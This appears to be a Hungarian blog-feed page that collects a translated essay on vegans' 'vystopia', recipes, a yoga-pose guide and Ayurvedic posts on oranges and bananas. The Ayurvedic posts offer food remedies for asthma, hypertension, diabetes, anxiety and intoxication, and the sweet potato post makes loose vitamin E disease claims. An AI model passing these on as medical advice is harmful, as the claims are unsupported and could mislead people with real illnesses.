Megrémültem, amikor felfedeztem a rendszerszintű kínzásokat, kegyetlenségeket modern társadalmunkban. Ugyanúgy, mint oly sok társam, akik előttem járták végig ezt az utat. A veganizmus felé tartó folyamat felnyitotta a szemem az állatok iszonyatos mértékű kihasználására, ami az ipari rendszereinkben folyik. Ezt szinte lehetetlen volt feldolgozni, és talán ez volt a legfájdalmasabb élmény, amit életemben valaha megtapasztaltam. Rettenetes a felismerés, hogy körülbelül 150 milliárd állatot ölünk meg évente, mindössze 7,5 milliárd ember kedvéért. Ezek az állatok csupán fogaskerekek az üzleti gépezetben, ahol nem jelentenek többet, mint egy termék, és egy egységnyi nyereség.
Eredeti cikk: https://www.veganpsychologist.com/do-you-suffer-from-vystopia/
Fordította: Kertész Tibor
A valóság, amellyel szembesültem, valójában egy disztópia.
A disztópia jelentése: “valamilyen, a jelenleginél rosszabb világ, illetve társadalom víziója. Az utópia negatív változata. (…) az ilyen társadalmakat általában elembertelenedés, elnyomó, totalitárius rendszerek uralma, természeti vagy társadalmi katasztrófa jellemzi, amely a társadalom drámai hanyatlásához vezet.” (Wikipédia).
Azonban, ami az állatok iparosított kihasználását illeti, ez nem egy elképzelt világ. Ez a valóság, és az emberek többsége mégis támogatja ezt a rendszert a mindennapi fogyasztói döntései által.
Minél többet tudtam meg, annál inkább kétségbeestem. És ezen a világon belül létezett egy másik valóság, ahol az állatok kizsákmányolása ellen felszólaló embereket kinevetik, vagy ellenállással, kritikával, közömbösséggel kell szembenézniük.
Az “Egyéni döntésem, hogy mit eszem!” felkiáltásoktól elszorult a szívem. Rájöttem, hogy ezt azok mondják, akiket elvakított az a szörnyűség, amihez tartoznak. Nem tudtam elmenekülni a fajizmus folyamatos megnyilvánulásaitól, amikor láttam, hogy mások állatokat vagy állati testnedveket esznek, állatokat viselnek, állati bőrből készült bútorokon ülnek, állati összetevőket tartalmazó, vagy állatokon tesztelt kozmetikumokat és háztartási termékeket használnak.
Az állatok kihasználásának támogatása olyannyira megdöbbentő volt, hogy úgy éreztem, nincs menekvés. És valóban nem is volt, hiszen bármilyen módon is próbáltam nem részt venni a nyereségközpontú rendszerben, másképpen élni, máshol vásárolni. Még ha úgy döntöttem is, hogy mindent másképpen csinálok, a körülöttem élő többi ember továbbra is támogatta ezt a disztópiát. Itt volt a szemem előtt, és a többiek látszólag képtelenek voltak meglátni a hatalmas mértékű megtévesztést.
Egy vegán egzisztenciális válsága
Mások, akik szintén túljutottak ezen a felismerésen, ezt az egzisztenciális krízist hasonlóan élhették meg. Engem az egzisztenciális-pszichoterapeuta és pszichológusi hátterem hozzásegített, hogy alaposan megértsem a döntéseimet és ezeknek az emberi pszichére gyakorolt hatásait.
Azonban, ellentétben azzal a nagyon személyes utazással, ahogyan mindannyian felfedezzük az életünk értelmét, rájöttem, hogy egy vegán nem tud elmenekülni ettől az őrültségtől azzal, hogy eltereli a figyelmét, vagy értelmesebbé teszi az életét. Azt hiszem azért, mert minden nap elkerülhetetlenül találkozik a disztópiával és azzal, ahogy a nem vegánok támogatják az állatokkal szembeni kegyetlenkedést.
A nem vegánok akaratlanul működnek együtt a kegyetlenséggel, amíg egy vegán fel nem hívja erre a figyelmüket. Ha egy vegán beszélget valakivel ezekről a kérdésekről, és a nem vegán ezután sem változtat az életmódján, akkor a vegán azt gondolja, hogy az illető egyetért a kegyetlenkedéssel, vagy el sem hiszi, hogy ez megtörténik, esetleg egyszerűen közömbös. Akárhogyan is, a nem-vegán most már rendelkezik a megfelelő információval, de ennek ellenére úgy dönt, hogy továbbra is támogatja a kegyetlenséget. Ezért mondják a vegánok, hogy barátaik vagy családjuk nem érti meg őket. Azt hihetik, hogy a nem-vegánok:
elfogadhatónak tartják a kegyetlenséget és az állatok kizsákmányolását.
nem akarják vagy nem tudják átérezni a vegán traumáját, vagy
nem hiszik el, hogy az állatkínzás valóban olyan hatalmas mértékű, mint ahogy ezt a vegán elmondja.
Visztópia
A vegánok egzisztenciális krízisét én visztópiának nevezem, ez a “vegánok által tapasztalt egzisztenciális válság, amely a disztópikus világgal való akaratlan együttműködés felismeréséből ered. A kapzsiság, az állandósult állatkihasználás és a fajizmus felismerése egy modern disztópiában”.
Ha a következő tüneteid vannak, akkor valószínűleg a visztópiától szenvedsz:
Harag
Intenzív bánat az állandósult állatkínzás óriási mértéke miatt
Frusztráció, amiért nem tudod felébreszteni az embereket szemellenzős állapotukból
Úgy érzed, elidegenedsz a nem-vegánoktól
Magányosnak érzed magad olyan csoportokban, ahol korábban jól érezted magad
Kétségbeesett és reménytelen vagy, úgy érzed, hogy a dolgok sohasem fognak megváltozni
Erőtlennek érzed magad ahhoz, hogy globális szintű változást idézz elő
Van-e gyógymód a visztópiára?
A visztópia gyógymódja egy olyan vegán világ, ahol az állatok kizsákmányolásán túl az emberek kizsákmányolása is megszűnik.
Az emberek kizsákmányolása mindig létezni fog, amíg részei vagyunk egy olyan gépezetnek, amely egyfajta révületben tart bennünket és gondolkodás nélkül elfogadjuk a jogtalanságot. Ez talán úgy hangzik, mint egy elérhetetlen utópia. Azonban az emberi történelem minden jelentős előrelépése a “normálisnak”, elfogadottnak számítótól nagyon eltérően gondolkodó emberek találkozásából emelkedett ki, akik egy nagyon eltérő jövőképhez ragaszkodtak.
Olyan vezetők kellenek, akik képesek megosztani másokkal ezt a jövőképet, és cselekszenek is, nem csak beszélnek a meggyőződésükről. Így a tömegek is bátran mondhatják: “Ennél tényleg tudunk jobbat, és meg is valósítjuk!” A vegánok az új vezetői ennek a bátor, új világ megteremtésének, és mindannyiunknak fel kell nőnünk a kihíváshoz, a történelem jó oldalára kell állnunk. Együtt létrehozhatunk egy olyan világot, amelyhez mindannyian szeretnénk tartozni, és amelyben minden érző lénynek jár a megbecsülés és a tisztelet.
Kép: Christopher Windus on Unsplash
The post Lehet, hogy te is a visztópiától szenvedsz? – A kegyetlenség rendszerének felfedezése appeared first on VegaNinja.
fahéjas sütőtökös piskóta tekercs
2018. április 8. Beautilicious
Imádjuk az egyszerű sütiket, mint például az elronthatatlan piskóta tekercset, amit az ember ezer féle képpen variálhat, így sose lesz unalmas. Az én töltelékem most egy fahéjás sütőtökös krém, hogy még kiélvezzük az utolsó sütőtököket. Hozzávalók - 4tojás - 75gr zabliszt - 40gr kókuszliszt - 45gr édesítőszer - 300gr sült sütőtök - 100ml tej - 50ml kávé - rumaroma - fahéj Így készítsd - Válaszd ketté a tojásokat - Verd a fehérjét kemény habbá - Keverd ki a sárgáját a fahéjon és a sütőtökön kívül az összes többi hozzávalóval - Forgasd bele a fehérjehabot, majd süsd ki a piskótát - Süsd 180fokon 15percig - A töltelékhez turmixold össze a sütőtököt a fahéjjal - Tekerd fel a piskótát a töltelékkel megtöltve
A számunkra legfinomabb granola (ajánló)
2018. április 3. Mindennapi ételeink
Anyukaként szeretném, hogy mi (akik a példát mutatjuk) és a gyermekeink is egészségesen táplálkozzunk. Fanni pl 1 éves koráig szinte csak anyatejen élt, mellette napi 1, majd 2 alkalommal kóstolgatott szopizás után zöldséget, később gyümölcsöt és gabonákat, olajos magvakat, hüvelyeseket. 2 éves koráig nem evett cukrot, helyette aszalt gyümölcsöket. Most sem édesszájú, és bár itthon kb 10 éve nem használok cukrot, csak eritrit, nyírfacukor, stivia, illetve szirupok és termelői méz található a spájzunkban, a rokonságtól kap néha, ha találkozunk csokoládét, cukros dolgokat, de nem bír sokat megenni belőlük. Gergővel is hasonlóan tervezem az első életéve(ke)t. Egy héten kb három-négy alkalommal eszünk édes reggelit. Ez általában növényi tejben főtt kása (zab, köles) vagy tejberizs, tejbedara (zabbal dúsítva), és müzli, vagy gofri, palacsinta; mindez gyümölcsökkel, magokkal. A bolti müzlik (nem reggelizőpehelyre, hanem granolára gondolok) finomak, de sajnos csak pár vegán közülük, illetve rejtett cukorforrások. Ezért örültünk meg nagyon a Granoland reggeli granola készítményeinek. Szüleimnél kóstoltuk meg az egyik terméküket és azóta felvettük a kapcsolatot a gyártókkal. A múlt héten pedig ajándékcsomagunk érkezett tőlük. Nagyon korrekt, kedves családi vállalkozás, érdemes megnézni a honlapjukat: www.granoland.hu. A granoláik kézműves termékek, nem tartalmaznak cukrot, ízfokozót, tartósítószert; azonban teljesőrlésű zabot, olajos magokat, aszalványokat annál inkább. 4 ízben rendelhetők: 1. Csokis-vörös áfonyás 2. Kókuszos-mazsolás 3. Fahéjas gyümölcs 4. Kókuszos-csokis Összetevők: teljes kiőrlésű zabpehely, méz, kókuszzsír (nem hidrogénezett), dió, mandula, szezámmag, napraforgómag, lenmag, himalaya só + 1. aszalt vörös áfonya, étcsokoládé csepp (59.9%), cukrozatlan kakaópor 2. kókuszchips, kókuszreszelék, mazsola 3. aszalt vörös áfonya, mazsola, aszalt sárgabarack, fahéj 4. kókuszchips, kókuszreszelék, étcsokoládé csepp (59.9%), cukrozatlan kakaópor Nagyon zamatos, laktató finomságok, melyek teljes értékű reggeli. A másik termékcsoportjuk a granola szeletek, melyek szintén jóízű, laktató finomságok, egyet, ha megeszünk pár gyümölcs kíséretében, meg is van az egészséges, tápláló, finom reggelink. Ez nálunk azért nagy előny, mert férjem sokat utazik és így változatos ételeket tud magával vinni. Ezekből 3 fajta kapható: 1. Csokis-vörös áfonyás 2. Gyümölcsös 3. Csokis- kókuszos Összetevők: Teljes kiőrlésű zabpehely, méz, kókuszzsír (nem hidrogénezett), dió, rizsszirup (bio), kókuszreszelék, mandula, kakaóvaj, szezámmag, napraforgómag, himalaya só + 1. étcsokoládé csepp (59.9%), aszalt vörös áfonya, cukrozatlan kakaópor 2. aszalt vörös áfonya, aszalt sárgabarack, fahéj 3. étcsokoládé csepp (59.9%), kókuszchips, cukrozatlan kakaópor. Mindenkinek ajánljuk, hogy ismerkedjenek meg a Granoland ötletgazdáival és gyártoival, illetve a finom termékeikkel. Facebook: https://www.facebook.com/granolandgranola Honlap: www.granoland.hu
csokipudingos süti
2018. március 25. Beautilicious
Boci-boci megfázott, sütöttem neki hát egészséges és finom bocisütit. :D hozzávalók tésztához - 4tojás - 200gr tejföl - 150ml tej - 50gr édesítőszer - 100gr zabliszt - 65gr kókuszliszt - 1tk sütőpor csokipudinghoz - 1cékla - 25ml kávé - 100ml tej - 1ek kakaópor - 1nagy marék datolya Így készítsd - Forrald fel a tejfölt a tojássárgájával és tejjel - Keverd össze a száraz hozávalókat, majd szitáld hozzá - Verd habbá a tojásfehérjét, és keverd a tésztához - A pudinghoz a hozzávalókat turmixold össze - Öntsd a Tésztát egy tepsibe, majd kanalazd bele elszórtan a pudingot - Süsd ki 200fokon 30perc alatt
Tégy a gerinced egészségéért! - Urdhva mukha svanászana (Felfelé néző kutyapóz)
2018. március 20. Élj harmóniában
Urdhva mukha svanászana (Felfelé néző kutyapóz) jól megnyújtja a test elülső vonalát - nyak, mellkas, has, combok - ezért segítség az ülőmunka kompenzálásában. Oldja a feszültséget az elmédből és a testedből, nyitja a mellkast és segít a helyes mozgásminta elsajátításában. Ez a jógapóz felfrissíti, élénkíti a tested és az elméd, ezáltal megfiatalít. A gerincedet egészségessé, rugalmassá teszi, stabilizálja a medencéd, javítja a testtartásod. Erősíti a csuklókat, karokat. Azáltal, hogy nagyon jól nyitja a mellkast, javítja a tüdő funkcióját, így segítséget jelent megfázásnál, asztmánál. Az Urdhva mukha svanászana kedvezően befolyásolja az emésztésed is, segít gyenge emésztésnél, puffadásnál, székrekedésnél. Hogy an végezd el? - Feküdj hasra és támaszd le a homlokod a talajra, a lábakat tedd csípőszéles terpeszbe. - Helyezd a tenyereidet a földön a vállad alá, terpeszd ki a kézujjakat, a középső ujjad legyen középen és nyomd a tenyered a talajba. - A vállakat gördítsd hátrafelé lefelé, próbáld összehúzni a lapockák alsó csücskét . - Fixáld a medencédet a farizmok megfeszítésével és a hasizmok aktivizálásával. - Belégzéssel emeld fel a fejed, a törzsed, a medencéd, a combokat, lábszárakat a talajról, csak a tenyerek és a lábujjak vagy haladóbb változatban lábfej (rüszt) maradjon a talajon. - Tartsd aktívan a medencédet és a lábakat is végig. - Az állad húzd be picit és nyújtózkodj a fejtetővel, ne törd meg a háti gerinc és a nyaki gerinc vonalát (egyes jógairányzatokban a fejet teljesen hátraengedik, én kezdőbb gyakorlóknál nem javaslom) - A vállakat folyamatosan húzd hátrafelé lefelé és nyisd a mellkast azáltal, hogy a kulcscsontokat távolítod. - Tartsd meg a gyakorlatot néhány légzésig. - Kilégzéssel lassan engedd vissza a tested a talajra. Kitartás alatt figyelj rá, hogy a tested súlya egyenletesen legyen elosztva a tenyereken és a lábakon, szimmetrikusan terheld a test két oldalát. Az ászana kitartása közben a tenyerek a talajon és a karok végig kinyújtva, a csukló, könyék, váll egy vonalban legyen és figyelj rá, hogy a könyékhajlatok egymással szemben helyezkedjenek el. Próbáld nyitni a mellkast - távolítsd a kulcscsontokat és tartsd aktívan a lapocka közti területed, ne ess be a két vállad közé. Folyamatosan nyújtóz z a fejtetővel és a szegcsonttal. A hasizmok legyenek aktívak (tartod a hasat, köldököt, deréktáji szakaszt). A lábakat nyújtsd ki teljesen és finoman húzd a térdkalácsot fölfelé, a combok is végig legyenek aktívak. A kitartás alatt egyenletesen, erőlködés mentesen próbálj lélegezni. Belégzéssel nyújtózz fejtetővel, szegcsonttal és kilégzéssel, amennyiben lábujjhegyen támaszkodsz nyújtózz a sarkakkal hátrafelé. Figyelj rá a lábfejek is legyenek párhuzamosak, ne dőljenek a bokáid sem befelé, sem kifelé, tartsd őket aktívan. Kilégzéssel told a tenyereket a talajba, belégzéssel a letolt tenyerekből próbálj még emelkedni a fejtetővel, szegycsonttal. A póz lebontása után hason fekvésbe pihenj meg. Élvezd, ahogy az urdhva mukha svanászana által termelt energia szétárad a testedben. Ne csináld a pózt, ha komolyabb csukló, könyök, boka problémád van vagy gyomorfekélyed van. Gerincsérv esetén esetén se végezd ezt a pozíciót. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. J ó gyakorlást kívánok:) szeretettel: Kati
Mandulas-chiamagos palacsinta
2018. március 19. Mindennapi ételeink
Gondolom, nem vagyunk egyedul, akik várjuk a tavaszt. Szeretnenk sok zamatos gyümölcsöt enni, illetve Fanni lanyunknak és nekem is nagyon hiányzik a kertészkedés: az, hogy lássuk az elvetett magok kibujasat, gondozhassuk a kis növényeket...Ez a reggeli friss eperrel meg finomabb, de most melyhuto uritesi szezonban fagyasztott szederrel fogyasztottuk. Hozzávalók: 15 dkg teljes őrlésű tonkolyliszt 7 dkg mandulaliszt 3 ek.chiamag ~4 dl mandulatej 1 ek.sutopor 4 ek.olaj 1 ek.eritrit (nyirfacukor) Fahéj, vanilia-izles szerint Elkészítés: A mandulatejbe belekeverjük a chiamagokat és kb 10 perc alatt hagyjuk, hogy megduzzadjanak. Eközben összekeverjük külön a száraz alapanyagokat, majd a mandulatejes chiamaghoz öntjük az olajat. Mindezt hozzáadjuk a száraz hozzavalokhoz. Kokuszzsirral kikent serpenyőben kisütögetjuk őket. Mézzel, sziruppal, lekvárral locsolva, gyümölcsökkel fogyasztjuk .
Vegán zserbó
Olykor-olykor megfogalmazódik bennem egy vágy, elkészíteni egy adott ételt vagy süteményt. Egyes esetekben jól ismert és általam vagy férjem által kedvelt étel vegán verziója a terv, más esetekben csak ötlet, hogy a különböző alapanyagok hogyan állnak össze egy komplett étellé. A zserbó is régebbi vágyam volt. Vegán zserbó. Ugyan az interneten keringenek különböző receptek, de nem nyerte el a tetszésemet egyik sem olyan mértékben, hogy azt mondjam, "igen, ez az! megcsinálom!" Városunkba, utánunk valamivel később, leköltözött Londonból egy nagykőrősi házaspár, nagyjából egyidősek vagyunk. Emlékszem, az első Londonban eltöltött karácsony alkalmával a feleség készített zserbót, majd amikor már itt laktak, akkor itt is. Így kezdett el bennem is mozogni a vágy, készítenék és ennék zserbót vegán módra. Nyáron, amikor Magyarországon voltunk, diót és baracklekvárt is kaptunk, tehát az alapanyagok adottak voltak. Félre is tettem mindkettőből annyit, hogy zserbót tudjak készíteni. Amikor már készítettem, rájöttem, hogy ennek bátrabban neki kezdhettem volna, mert nekem elég egyszerű. Bár sok hozzávalót tartalmaz, mégsem olyan nehéz elkészíteni. Legyen húsvét vagy karácsony, vendégvárás vagy vendégségbe készülődés, remek desszert a vegán zserbó.
Miután Gerbeud feleségül vette a genfi csokoládégyáros lányát, Ramseyer Esztert, 1884-ben, 30 évesen, Magyarországra költözött, majd 1885-ben átvette Kugler Henrik cukrászdáját a budapesti Gizella (ma Vörösmarty) téren, berendezte a városligeti Királycsarnokot, feltalálta a macskanyelvet, a csokoládés drazsét, többszáz-féle bonbont exportált Európába, Dél-Amerikába, még a török szultán háremébe is szállított, folyamatosan dolgozott. Produktív életet élt. A kérdés azonban felvetődik bennem is, mi köze Gerbaud-nak ehhez a finom süteményhez? Valóban az ő kezének a produktuma? Evett - e életében zserbó szeletet Emil Gerbaud?
Állítólag a Gerbeaud-házban 1948-tól működő Vörösmarty Cukrászda találmánya volt a híressé vált dió és lekvár kompozíció, tetején csokimázzal, azaz a >>zserbó-szelet
A narancs áurvédikus felhasználása
2018. március 12. Élj harmóniában
A narancs az ájurvéda szempontjából savanyú, édes és fűtő hatású. Nehezen emészthető, tápláló gyümölcs. Megnyugtatja a vata-t , az édes narancs jó a pittáknak mértékkel fogyasztva, de ha savanyú kifejezetten kedvezőtlen. Ha valaki sokat eszik a kapha-t stimulálja. Ezért a sok narancs fogyasztása nyálkásodást, taknyosodás okozhat. Néhány ájurvédikus alkalmazási mód: - 1 csésze friss narancslé egy csipet kősóval, kiváló sportolás utáni fáradtságra. Annak érdekében, hogy a pittát ne irritálja tegyél hozzá 10 csepp friss lime levet. - 1 csésze friss narancslé, fél teáskanál természetes cukorra (pl. teljes értékű barna nádcukor vagy sharkara cukor) és egy őrölt csipet római kömény jó a vérző ínyre, a véreres szemekre és az aranyeres betegségekre. - Alkoholos vagy kábítószeres befolyásoltság esetén, fogyassz 1 csésze friss narancslevet 1 teáskanál lime levével és egy csipet őrölt római köménnyel. - Égető vizeletre, ödémára és magas vérnyomásra jótékony 1 csésze friss narancslé, fél csésze friss kókuszlével naponta 2* vagy 3* fogyasztva. - Aggodalom, szorongás és megnövekedett szívritmus esetén nagyon jó 1 csésze friss narancslé, egy teáskanál mézzel és egy csipet szerecsendióval. - Az édes narancs leve nagyon tápláló a terhesség ideje alatt. - Emésztési problémák és gázosodás esetén, igyál egy csésze narancslevet egy csipet hinggel és egy csipet ajwainnal (ezek indiai boltokban beszerezhetőek) . Ez nagyon jól segít a gázokat felszabadítani és javítja az emésztést. Kizárólag vegyszermentes (bio) narancsot fogyassz. felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Csokikrém (superfood)
Hozzáadott cukor nélkül, növényi tejtermékmentes WANTED! Amit nagyon kerestem, az egy stabilan álló, nem növényi tejtermékes csokikrém. Olyat szerettem volna, ami nem folyik csak úgy el 20 perc elteltével, és nem kell vadásznom hozzá mindenféle spéci hozzávalót. Legyen jó csokis, legyen jól formázható, és az sem baj, ha nem kell beleönteni zsák cukrokat és margarinokat. Éééés.. Sikerült, megvan! :) Mondjuk, olyan sokat azért nem kellett keresnem, miután a spejzban hasra estem a 3 kg édeskrumplimban. Ezután felgyorsultak az események. :D Ó, Istenem, hát, ki látott már olyat, hogy egy csokikrém az idővel nemhogy nem puhul, de egyre keményebb lesz? Köszönöm, és imádom!
joghurt szelet
2018. március 8. Beautilicious
Egy pille könnyű meglepetés negyed óra alatt! Nagyon könnyed fehérje dús cukor és gluténmentes finomság mindenféle főzőtudomány nélkül. Kár lenne kihagynod :D Hozzávalók - 400ml görög joghurt - 100gr édesítő - 50gr barnarizs liszt - 4 tojás fehérje Így készítsd - Keverd össze a tojásfehérjén kívül az összes hozzávalót - Verd habbá a tojásfehérjét, majd forgasd a joghurthoz - Öntsd sütőpapírral bélelt tepsibe, és süsd 170fokon 15percig
Csőben sült édesburgonya
Amellett, hogy C-vitamin és béta karotin forrás, E-vitamint is tartalmaz az édesburgonya, más néven batáta. Magyar és angol nyelvű oldalakon, valamint egy angol nyelvű könyvben próbáltam utánanézni mennyi E-vitamint tartalmaz 100 gram édesburgonya, és meglehetősen változatos számokat találtam. A könyv szerint 130 gram sült édesburgonya 7,7 mg E-vitamint, jobban mondva Tocopherol-t tartalmaz. (Kristen Hartvig, The healthy diet calorie counter, 2004, 126.o.). A könyv leirja, hogy az E-vitamin is egy fő antioxidáns, akárcsak a C-vitamin. Sejtmembrán védő szerepe van. Mivel minden szervünk sejtekből épül fel, ezért igen fontos, hogy legyen megfelelő mennyiségű E-vitamin mindennapi táplálékainkban. Külön kiemelendő, hogy csökkenti a szívbetegség, rák és cukorbetegség kockázatát. Egyes tapasztalatok szerint rendszeres E-vitamin szedés során cukorbetegek inzulinadagja csökkent. Az E-vitamin a hőt lényegesen jobban bírja, mint a C-vitamin, 170 fokon pusztul el ugyanis. A következő ételnél ha ügyelünk a főzési/sütési hőmérsékletre, akkor ételünkben marad E-vitamin. Ezzel támogatjuk sejtjeinket, segítjük őket a szabadgyökök elleni védekezésben.
A recept
Hozzávalók:
- 1,5 kg édesburgonya (ebben a receptben vegyesen lila és sárga batáta)
- 1,5 csomag tofu
- szójatej
- 2 ek sörélesztő pehely
- só
- 1-2 gerezd fokhagyma
- kurkuma
- kókuszzsír
Elkészítés:
A megmosott batátákat héjastól vízben megfőzzük, de ne túl puhára. Közben felszeleteljük a tofut, és némi szójatejjel és sörélsztő pehellyel összeturmixoljuk. Sűrűbb szószt kapunk, olyasmit mint egy folyósabb joghurt. Sóval, 1-2 gerezd fokhagymával és kurkumával ízesítjük ezt a szószt a turmixolás során.
A megfőtt batátákat hideg vizzel átzuhanyoztatjuk, majd ha picit lehűltek, megpucoljuk őket, és felkarikázzuk. A tűzálló tálat kókuszzsírral kikenjük. Először egy sor felkarikázott batátát teszünk, megsózzuk, majd a tofus szósz egy részével beterítjük. Következő sor felkarikázott batátát megsózzuk és arra is öntünk a tofus szószból. Ezt addig csináljuk, míg az édesburgonya és a szósz el nem fogy. Ezután mehet a sütőbe, ahol pirulásig sütjük, maximum 150-160 fokon.
A banán hatásai és ájurvédikus alkalmazása
2018. február 24. Élj harmóniában
Az éretlen banán hűtő hatású, növeli a vata-t, csökkenti a pitta-t és a kapha-t. Az érett banán édes és fűt, csökkenti a vata-t és növeli a pitta-t és a kapha-t. A banán afrodiziákum, energetizálja az izmokat, a zsírt, az idegeket és a szöveteket. Amennyiben a banánt helytelenül fogyasztjuk, úgy a szervezetben ama-t (salakanyag, méreganyag) képez és gyengíteni fogja az emésztést, nyálkásodáshoz, taknyosodáshoz, megbetegedésekhez vezethet. Annak érdekében, hogy a banán fogyasztása kedvezően hasson a szervezetedre, légy elővigyázatos és tartsd be az alábbi néhány ajánlást: - Banán evés után legalább 1 óráig ne igyál semmilyen italt. - Ne egyél estére, éjszakára banánt - Banánt sose fogyaszd együtt tejjel vagy joghurttal. - Ne egyél banánt, amennyiben lázas vagy ödémás vagy, amennyiben hánysz vagy hányingered van, ha nyálkás köhögésed van, csöpög az orrod taknyos vagy. Néhány ájurvédikus alkalmazási mód: A fenti ajánlásokhoz mindig érett banánt használj. - Stresszevésnél és helytelen evési szokások esetén vágj fel egy banánt, adj hozzá egy teáskanál ghít (a ghí készítését itt találod) és egy csipet kardamomot. Ez jó székrekedésre, izom görcsök esetén és alacsony vércukorszint esetén is. - Ha nagyon savas ph, székrekedés van vagy álmatlanság miatt égő vizeleted van, akkor étkezések között egyél 1 vagy 2 banánt egy csipet római köménnyel. - Ha száraz vagy nyálka nélküli köhögésed van, amihez esetleg mellkasi fájdalom is társul akkor a nap során kétszer vagy háromszor egyél 1 vagy 2 banánt egy teáskanál mézzel és két csipet őrölt fekete borssal. - Vegyél 2 banánt, 5 friss fügét, 5 friss datolyát darabold őket össze. Tegyél hozzá 1 vagy 2 kanál mézet, 2 csipet gyömbérport és fogyaszd el egy teljes étkezésként. Ez kiváló szer izomgyengeség és izomsorvadás esetén. - Krónikus asztma esetén helyezz be 7 szegfűszeget 1 meghámozott banánba 1 éjszakára, másnap reggel fogyaszd el a banánt és a szegfűszeget is. 1 órával később igyál egy csésze forró vizet, 1 teáskanál mézzel. Ez energiát ad a tüdődnek és lecsökkenti a zihálást, asztmás légzés. - Hasmenés esetén próbálj megenni két zöld felvágott banánt, 1 teáskanál ghí-vel és két csipet gyömbérporral. 1 órával később igyál 1 csésze forró vizet. - Cukorbetegséggel járó túlzott vizelés esetén, próbálj enni egy éretlen banánt 1/3 csésze keserű dinnyelével egyszer a nap során. - Csuklás megállítására, egyél 2 felvágott banánt, egy teáskanál ghível, fél teáskanál mézzel, 2 csipet gyömbérporral. Kizárólag vegyszermentes (bio) banánt fogyassz. felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Almás zabpelyhes keksz – tojásmentes, cukormentes, tejmentes
2018. február 22. Eszemiszom – Jóga Magazin
Ha tél és gyümölcs, akkor, az leginkább az alma. Ilyenkor érdemes a szezonalitásnak megfelelő gyümölcsöket, zöldségeket enni, mert sajnos pl. a déli gyümölcsök ugyan finomak, de természetüket tekintve hűtik és nedvesítik a szervezetet és nehezebb őket a szervezetnek emészteni ilyenkor. Ezért fázékonyságot, puffadást, orrfolyást, etc. eredményezhetnek.
Ha már alma, ma egy nagyon puha zabpelyhes kekszek készítettem. Ez egy egyszerű, gyors és egészséges finomság. Lehet reggeli vagy desszert is. Készítheted teljesen cukormentes változatban is, ha édes az alma. Gluténmentes diétában, gluténmentes zabpelyhet és zablisztet használj.
Hozzávalók
1 csésze zabliszt
1 csésze zabpehely
1 tk. szódabikarbóna
1 tk. fahéj
1/4 tk, vanília
1 csipet szárított gyömbér
1/3 csésze kókuszolaj (vajat is használhatsz helyette)
2 ek. lenmagliszt
8 ek. víz
4 közepes alma
Vegyszermentes (bio) alapanyagokat használj!
Az almát mosd meg, hámozd meg és reszeld apróra vagy használj aprítógépet. A lenmaglisztet öntsd le a vízzel és hagyd állni egy picit – ez fogja összetartani a tésztád. (A “tojás helyettesítéséről” egy korábbi bejegyzésben részletesen írtam már itt olvashatod)
Egy tálban keverd össze a zablisztet, zabpelyhet, szódabikarbónát, fűszereket. Ha nagyon édesszájú a család keverj hozzá teljes értékű nádcukrot. Majd keverd hozzá az olvasztott kókuszzsírt és add hozzá a lenmaglisztes keveréket. Az egészet keverd gyorsan össze. Amikor elkeverted a tésztát, kanál segítségével egy sütőpapírral bélelt tepsire tegyél adagokat és nyomkodd le, hogy keksz formája legyen.
Tedd 180°C fokra előmelegített sütőbe és süsd amíg aranybarnára sül. (kb. 20-25p) . A végén ha édesebben szeretnétek egy kis barna nádcukorral szórd meg.
Almás zabpelyhes keksz - tojásmentes, cukormentes, tejmentes
2018. február 18. Élj harmóniában
Ha tél és gyümölcs, akkor, az leginkább az alma. Ilyenkor érdemes a szezonalitásnak megfelelő gyümölcsöket, zöldségeket enni, mert sajnos pl. a déli gyümölcsök ugyan finomak, de természetüket tekintve hűtik és nedvesítik a szervezetet és nehezebb őket a szervezetnek emészteni ilyenkor. Ezért fázékonyságot, puffadást, orrfolyást, etc. eredményezhetnek. Ha már alma, ma egy nagyon puha zabpelyhes kekszek készítettem. Ez egy egyszerű, gyors és egészséges finomság. Lehet reggeli vagy desszert is. Készítheted teljesen cukormentes változatban is, ha édes az alma. Gluténmentes diétában, gluténmentes zabpelyhet és zablisztet használj. Hozzávalók 1 csésze zabliszt 1 csésze zabpehely 1 tk. szódabikarbóna 1 tk. fahéj 1/4 tk, vanília 1 csipet szárított gyömbér 1/3 csésze kókuszolaj (vajat is használhatsz helyette) 2 ek. lenmagliszt 8 ek. víz 4 közepes alma Vegyszermentes (bio) alapanyagokat használj! Az almát mosd meg, hámozd meg és reszeld apróra vagy használj aprítógépet. A lenmaglisztet öntsd le a vízzel és hagyd állni egy picit - ez fogja összetartani a tésztád. (A "tojás helyettesítéséről" egy korábbi bejegyzésben részletesen írtam már itt olvashatod) Egy tálban keverd össze a zablisztet, zabpelyhet, szódabikarbónát, fűszereket. Ha nagyon édesszájú a család keverj hozzá teljes értékű nádcukrot. Majd keverd hozzá az olvasztott kókuszzsírt és add hozzá a lenmaglisztes keveréket. Az egészet keverd gyorsan össze. Amikor elkeverted a tésztát, kanál segítségével egy sütőpapírral bélelt tepsire tegyél adagokat és nyomkodd le, hogy keksz formája legyen. Tedd 180°C fokra előmelegített sütőbe és süsd amíg aranybarnára sül. (kb. 20-25p) . A végén ha édesebben szeretnétek egy kis barna nádcukorral szórd meg.
gőzgombóc
2018. február 16. Beautilicious
Életem első, de nem az utolsógőzgombócát készítettem el ma reggel. Mindössze 5 perc a mikróban, és kész a csoda. Nagyon finom alap, ami sokféle képpen variálható. Nálam most a csokis kókuszos ízben készült hozzávalók - 100gr túró - 1tojás - 25gr barna rizsliszt - 25gr kókuszliszt - 1tk sütőpor - 30gr kakaópor - 30gr kókuszreszelék - 30+30gr édesítő - 100+150ml tej így készítsd - bögrébe keverd össze a túrót, tojásfehérjét, liszteket, 30gr édesítőt,100ml tejet, és sütőport - a pudinghoz főzzük meg a tojássárgáját, kakaóport, 30gr édesítőt,kókuszreszeléket, és 150 ml tejet - tölts meg a pudinggal a keveréket, és tedd mikróba 5 percre
Édesburgonya-tofu-leveleskel curry (laktózmentes, gluténmentes, vegán)
2018. február 13. Zizi kalandjai
